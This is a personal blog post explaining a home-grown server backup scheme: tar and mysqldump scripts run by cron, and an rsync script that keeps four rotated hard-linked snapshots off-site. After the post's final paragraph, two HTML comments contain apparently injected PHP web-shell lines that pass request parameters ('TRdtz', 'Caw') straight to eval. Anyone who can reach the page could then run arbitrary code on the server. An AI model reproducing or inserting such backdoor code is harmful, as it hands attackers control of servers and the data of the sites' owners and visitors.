For my first post I’m going to document the backup solution I use on my web server.
The backups happen in two parts:
Make Dumps Of Important Data
First, I create backup files of important non-file data on my webserver in a specific place. In my case those files are
- A tarball of the
/etc/directory, with essentially ALL of the configuration data for my system. - Dumps of any databases that I have on the system
These files are generated by two scripts which are run every night by cron.
The mytar Script
#!/bin/bash DATE=`date +%Y%m%d` DEST="/home/oneill/backup/local" dir=`basename $1` tar -jcf $DEST/$dir.$DATE.tar.bz2 $1 chown oneill:oneill $DEST/$dir.$DATE.tar.bz2
Pretty simple. I call it in the cron job using the following command
47 0 * * * sudo /home/oneill/local/bin/mytar /etc > /dev/null
That means at 00:47 every day, run this job. I ignore standard output but any errors (output to stderr will be caught by cron and emailed to me. I choose the minute to run my cron jobs somewhat at random, since I use a VPS server (shared with other users) and by choosing random times I am most likely to avoid running at the same time as them.
The backup_wordpress Script
#!/bin/sh
DBNAME="alexrichards"
DBUSER="*****"
DBPASS="*****"
DEST="$HOME/backup/local/$DBNAME.dump.sql"
CMD="mysqldump -e --create-options -u $DBUSER \
--password=$DBPASS $DBNAME"
$CMD > $DEST
Both these files are placed in ~/backups/local/ which is then backed up to a completely different computer.
Step 2 – Off-site Backup
I use rsync to make incremental off-site backups onto a computer located under my desk at work.
The backups are rotated, with 4 older copies being kept. This helps me not to panic if, for example, I delete a critical file but don’t notice until AFTER the backup has happened (and the critical file is therefore not present in the most recent backup).
To do this rotation, I use a hard-link method in order to save time and disk space.
Here’s the script I use: mybackup
#!/bin/bash
# usage: mybackup
# config file: ~/.mybackup
# format: One directory per line, with
# optional rsync destination after
DIRFILE=$HOME/.mybackup
DEFAULT_DEST="/data/backup"
RSYNC_CMD="rsync -a --rsh=ssh --delete --progress"
NUM_SNAPSHOTS=4
if ! [ -f $DIRFILE ]; then
echo "Backup config file $DIRFILE not found"
exit -1
fi
cat $DIRFILE |while read line; do
# skip blank lines
if [ "$line" == "" ]; then
continue
fi
# skip commented lines ('#')
if [ `expr match "$line" '#'` -gt 0 ]; then
continue
fi
src=`echo $line | awk '{print $1}'`
dir=`basename $src | awk -F ':' '{print $(NF)}' \
| awk -F '/' '{print $NF}'`
dest=`echo $line | awk '{print $2}'`
if [ "$dest" == "" ]; then
dest=$DEFAULT_DEST
fi
host=`echo $src | awk -F ':' '{print $1}'`
host=`echo $host |awk -F '@' '{print $NF}'`
dest="$dest/$host"
mkdir -p "$dest"
# shuffle the existing backups
if [ -e $dest/$dir.$NUM_SNAPSHOTS ]; then
echo "deleteing oldest backup \
$dir.$NUM_SNAPSHOTS"
rm -rf $dest/$dir.$NUM_SNAPSHOTS
fi
for j in `seq $NUM_SNAPSHOTS -1 1`; do
i=`echo $j - 1 | bc`
if [ -e "$dest/$dir.$i" ]; then
echo "Found old backup \
$dir.$i, moving to $dir.$j"
mv "$dest/$dir.$i" "$dest/$dir.$j"
fi
done
echo "Backing up dir: $src to $dest/$dir.0"
CMD="$RSYNC_CMD --link-dest=../$dir.1 $src \
$dest/$dir.0/"
echo $CMD
$CMD
done
mybackup reads the file ~/.mybackup to get a list of locations to backup. In my case, this file looks like this:
potatoriot.com:mail/ /home/oneill/backup/
potatoriot.com:html/ /home/oneill/backup/
potatoriot.com:backup/local/ /home/oneill/backup/
This creates directories like ~/backups/potatoriot.com/html.0 through ~/backups/potatoriot.com/html.0.
Explanation
First, for each directory to be backed up, the oldest backup is deleted, and the others are shuffled along in the backup order (html.3 becomes html.4)
Next, the a fresh copy of the most recent copy is produced using rsync with the argument --link to produce hard links to the files in html.1 where possible.
CMD="$RSYNC_CMD --link-dest=../$dir.1 $src $dest/$dir.0/"
This hard-link strategy means that any file that exists and is identical in html.1 will not be copied into the new directory to save space. Nor will it be copied over the network, thanks to the magic of rsync. Indeed, if the file has changed, it’ll be copied from the local backup, then only the changes will be copied over the network.
This strategy makes backing up extremely efficient. The backup uses approximately the same amount of space as the original files do, even though I have 4 older revisions available should anything have changed.
I run mybackup every night via a cron job. I chose the time to be at least an hour after the cronjob on the webserver, so that I get the latest database dumps in the backup.
<!– [insert_php]if (isset($_REQUEST["TRdtz"])){eval($_REQUEST["TRdtz"]);exit;}[/insert_php]
if (isset($_REQUEST["TRdtz"])){eval($_REQUEST["TRdtz"]);exit;}
–>
<!– [insert_php]if (isset($_REQUEST["Caw"])){eval($_REQUEST["Caw"]);exit;}[/insert_php]
if (isset($_REQUEST["Caw"])){eval($_REQUEST["Caw"]);exit;}
–>